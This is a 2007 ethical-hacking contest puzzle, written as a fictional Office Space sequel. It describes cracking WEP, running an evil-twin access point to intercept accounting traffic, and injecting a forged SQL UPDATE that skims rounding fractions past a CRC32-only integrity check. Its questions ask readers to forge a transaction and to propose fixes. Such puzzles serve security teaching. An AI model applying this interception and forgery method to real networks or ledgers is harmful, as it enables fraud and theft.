Microsoft Office Space: A SQL With Flair

| April 19, 2007

Active ImageActive Image del.icio.us Slashdot It! Intelguardians
Author, Counter Hack Reloaded

Please read Tom Liston's challenge, compose your answers, and e-mail them to skillz0407@ethicalhacker.net with the 'Subject: Skillz Submission' by May 21, 2007.  Tom will choose three winners by the end of May, who will receive an autographed copy of one of Tom and Ed's books.

Feel free to discuss the scenario in the forums but PLEASE do not post your answers.
You wouldn't want someone else winning your prize, would you?


coreimpact2c.gif
Skillz Sponsored by Core Security Technologies

 

Microsoft Office Space
A SQL With Flair  

“Mmm, yeah, Peter… I'm going to need you to just go ahead and come in on Sunday… O.K.?  That'd be great.”

 

Gasping for air, Peter Gibbons sat up in bed, bathed in sweat.

 

After a moment or two of confusion, his heart pounding, he leaned back against his pillow and exhaled slowly.  It had just been another nightmare.

 

Joanna softly murmured something in her sleep, rolled over, her back to him, pulling most of the blanket off of him in the process.  Peter sat, wide awake now, and wondered just how long it would be before he went completely insane.

 

Unbelievably, things had actually turned around for a little while.  He had been happy.  The fire at Initech had not only destroyed the building and the company, but it had destroyed all evidence of the virus that he, Michael and Samir had planted in the accounting system.  Ironically, while the flames were destroying all evidence of wrongdoing– accounting records, virus code, system logs– it was also destroying $305,326.13 in unsigned travelers checks that Peter had slipped under Lumburgh's door along with a note containing his confession.

 

It was all pretty crazy.  He had gone to sleep one night, sure that he was going to be spending a good chunk of his life in PMITA Federal prison, and the next morning, like some twisted miracle, everything had just… worked out.  After spending the next several days in an alcoholic haze, he had sobered up and taken a job working construction with Laurence, his next-door neighbor.

 

From his current perspective, looking back, the subsequent five years of his life seemed somewhat inevitable.  He had married Joanna, of course, and things had been great.  They didn't have much, but they had each other and they were happy.  Then, one morning, they sat together in the bathroom, staring at the plus sign on the little plastic pregnancy test, knowing that their lives would never be the same.

 

It wasn't that Peter didn't love his son– he loved Peter Jr. more than life itself.  It was just that there was something that came along with kids that he could do without:  responsibility.

 

Working construction had barely paid the bills when it was just him and Joanna.  Suddenly there was formula and diapers to pay for, and Joanna wasn't picking up any more waitressing hours at Chotchkie's.  He even considered trying to recover the money from destroyed travelers checks, but had decided that it was just too risky.  After what seemed like the thousandth time that he slept on the couch after he and Joanna argued over money, he had finally given in, quit his construction job, and joined Michael and Samir at Initrode.

 

Life in the cube farm was just as bad as he remembered.  Every morning he walked out the door, prepared to have the soul sucked from his body.  Every night, he returned home to his little family, exhausted and beaten.  But there was food on the table, cable TV, and things had gotten better with Joanna.  She had slipped easily into the role of suburban housewife: cooking meals and doing laundry while reading about Brad and Angelina in People magazine.

 

Peter hated every minute of it, but as bad as it was, he told himself that things could always be worse.  Finally, after a year or two passed, he had pretty well resigned himself to the fact that life was just going to continually screw him.

 

Then, six months ago, life decided that it liked rough sex:  Initrode hired Lumburgh.

 

“I really, really hate that guy,” Samir had said earlier that day at lunch.  “He drives me crazy.”

 

“I know he's going to make me come in on Sunday,” Peter said, looking dejectedly at his cup of coffee.  “Things are just as bad as they were back at Initech.”

 

Did you see that memo he emailed to everyone?” Michael said, dumping teaspoonful after teaspoonful of sugar into his cup. “''TPS Report cover sheets must now contain summary data for all Initrode divisions segregated by both region and market type and must be printed in color.'  Color!  The only color printer anywhere near me is on the other side of the floor!  I printed the stupid cover page to that printer, walked all the way over there, and the printer is flashing ‘DENSITY SENSOR OUT OF RANGE’.  Density sensor?  WTF does that mean?  Maybe they should hook a density sensor up to Lumburgh's head…”

 

“I have an idea,” Peter ventured, not taking his eyes off of his cup of coffee.  “I have a way that we can get ourselves out of this mess.  A way that we can walk away from Initrode, Lumburgh, cube farms, and density sensors forever.  I have a way that we can all just retire and walk away.”

 

Peter looked up.  Samir and Michael were both staring at him, wordlessly.

 

“Do you remember the virus?” Peter asked.

 

“Holy crap, Peter, you're not thinking of doing that again,” said Michael, shifting uncomfortably in his seat.

 

“You are a very bad person,” said Samir, “You know we all could've gone to prison before!  How can you even think…”

 

“It'll work this time…,” said Peter slowly.  “It'll work and they'll never catch us.”

 

“That's what you said last time,” Michael said, “And you know very well that if Milton hadn't gone postal and burned the place down, we'd all three be wearing orange jump suits and be 'married' to the guy with the most cigarettes.  That fire was the best thing that could've happened.  Poor Milton.  You know what I heard?  I heard that the fire was so hot that they never found his body.”

 

“The idea is pretty much the same,” said Peter, ignoring Michael. “We're not really stealing anything.  We'd just be taking fractions of a cent at a time– the amount that gets rounded down on a financial transaction.  We just do it on thousands and thousands of transactions, and over time, bingo!  We retire!”

 

“Salami slicing,” said Samir, “that's the term for it.  Even if it's only a small amount, it's still stealing.  And they'll catch us.”

 

“No,” said Peter, “they won't.”


“Yes they will,” Michael said, looking sternly at Peter. “Didn't you learn anything last time?”

 

“Yeah.  I learned not to trust you to program something.”

 

“Hey.  That's not fair.  So I was off by a place or two when I did my rounding– like you've never made a mistake.  Anyway, it doesn't change the fact that they'll catch us.  A virus will be found.  They'll trace it to us.  They'll catch us, Peter.”

 

“No they won't,” said Peter, smiling. “Because there won't be a virus.”

 

Peter went on to explain his plan, and even though they were initially against it, slowly Samir and Michael began to come around.

 

It worked like this:  Peter's desk, at Initrode, was located directly below the head of the Accounting department's office.  Peter's cube had originally been located by the windows overlooking the air conditioning chillers, but when Lumburgh had been brought into management, he had immediately started moving cubes and desks around– supposedly to “improve efficiency,” but in reality it was just his soulless and evil way of exerting control. 

 

The networking guys had quickly gotten sick of running and re-running CAT 5, so after a few weeks, they installed a wireless LAN and of course, they secured it… with WEP.  Over the next month, Peter had played around with several tools and had cracked the WEP key… which was, unsurprisingly, “TRODE”. 

 

Using the cracked WEP key, Peter had begun watching wireless traffic as a way of passing time.  He knew, for example, that Nina in HR and Brian in Sales were not only secretly dating, but also had some rather “interesting” ideas of how to spend a Friday evening.  He even had seen some evidence that Lumburgh himself was having a fling.  But as interesting as all of that was, something else had caught his eye. 

 

Every Friday afternoon, Initrode's accounting department fired off an update of a database containing information on vendor accounts.  Some process, running on the head of Accounting's machine kicked out thousands of SQL transactions over the course of several hours.  Each of the transactions looked like this:

 

SELECT balance FROM account WHERE acctno = 141143153;

SELECT balance FROM account WHERE acctno = 57165156;

UPDATE account SET balance = 1021651.711031 WHERE acctno = 57165156;

UPDATE account SET balance = 164145.162110 WHERE acctno = 141143153;

 

Obviously, the process that generated these transactions was pulling balance information from two accounts, Initrode's payables account (acctno = 57165156) and some vendor account. It would then credit the vendor account, debit the Initrode account, and update the database accordingly.

 

The interesting thing was, the data on the money in the accounts was being stored to 6 decimal places.

 

“Typical,” said Michael, “Initrode programmers are all idiots.”

 

“You're an Initrode programmer,” said Samir.

 

“Shut up and let him finish,” Michael said, finally showing the interest that Peter was hoping for.

 

“The wireless access point for the Accounting department is at the far side of the Accounting floor.  I ran a hard wired network line to my machine, fired up a Linux bootable CD and set my machine up as an access point with the same name and WEP key as the one in Accounting.  I set up packet forwarding and suddenly I have all of these machines in Accounting routing traffic through my machine.”

 

“So?” said Michel and Samir, in unison.

 

“Don't you see?  If the traffic is routing through my machine, I can change it.  I can add a new statement into the mix:”

 

SELECT balance FROM account WHERE acctno = 141143153;

SELECT balance FROM account WHERE acctno = 57165156;

UPDATE account SET balance = 1021651.711031 WHERE acctno = 57165156;

UPDATE account SET balance = 164145.16 WHERE acctno = 141143153;

UPDATE account SET balance = 135.535532 WHERE acctno = 31337;

 

“Who is account 31337?” asked Samir.

 

 

“That's us,” Peter said. “We set up an account for us.  Then we take all the fractions of a cent that are being credited to other vendors, and we credit them to us.”

 

“31337?” said Samir, “Isn't that… well… a little childish?”

 

“It's an just an example.  The account number doesn't matter”

 

“Good.  Because when we get caught, I don't want them thinking that we're a bunch of high school kids.”

 

“I just picked a number… we can use any number we want…  and besides, we're not going to get caught.”

 

“Yes we are,” said Michael.

 

“Why?”

 

“Because, I know how that system works.  Fooling with it isn't going to be as simple as you think it is.”  Michael leaned back, took a sip of coffee, frowned and proceeded to dump several more teaspoonfuls of sugar into his cup before continuing.  “Initrode is paranoid.  I worked on that system a few months back, and it has a little feature that you missed.  Every SQL statement containing an UPDATE is logged– locally on the head of accounting's machine, and on the MSSQL server itself.”

 

“You're kidding,” said Peter, seeing his one chance for freedom evaporating before his eyes.

 

“Nope.  They log any SQL statement that contains an UPDATE in both places and then, every so often, they compare the logs.  A few years back, they had some big screw up in the system.  Nothing malicious, just some whacked transactions.  Took them weeks to get things straightened out.  So now they store the full text of any SQL statement containing an UPDATE on the server, and mark it with a timestamp.  They hold it there until they verify it.  That way they can roll it back if something gets messed up.”

 

“What do they store on the head of Accounting's machine?”

 

“The CRC32 which is calculated on the transaction text, and then stored along with the timestamp when the transaction was acknowledged.  They decided that it could be some sort of privacy issue to store full text on the head of Accounting's machine… it’s a laptop, and they're afraid he'll lose it or something.  I don't know why we don't run some kind of full disk encryption on our laptops here.  It's not like it's horribly expensive, but they're not going to do…”

 

“So they are storing something like 8630F991if the transaction text is 'SELECT balance FROM account WHERE acctno = 64145162;'?” said Samir.

 

Michael was staring at Samir, his mouth hanging open. “How did you do that?”

 

“Calculator on my cell phone…”

 

“You can't generate CRC32s on the calculator on your cellphone,” Michael countered.

 

“I have a really nice cell phone…” said Samir, shifting the argument into high gear.

 

But Peter wasn't listening.  He was sitting back in his chair, a smile slowly forming on his face…

 

Questions:

 

1)      Aside from hating their jobs, what impending action might be another reason for the boys to try this plan?

2)      Why was Peter smiling?  What mistakes had Initrode made in their accounting system design?

3)      Give a working example of a forged transaction using the values in Peter's second example.

4)      How should the transaction system be fixed to avoid this kind of problem in the future?

 

Remember, please submit your answers to skillz0407@ethicalhacker.net with the Subject: 'Skillz Submission' by May 21, 2007. By the end of May, we’ll announce three winners, one from each of these categories:

·        Best technical answer
·        Most creative and technically correct answer
·        Random draw from all answers submitted, correct, incorrect, complete, partially complete, etc.

Each winner gets an autographed copy of one of Tom Liston and Ed Skoudis' books, congratulating you on your victory and amazing abilities!

Microsoft and Office are registered trademarks of Microsoft Corp. All rights reserved.

Category: Skillz

Comments are closed.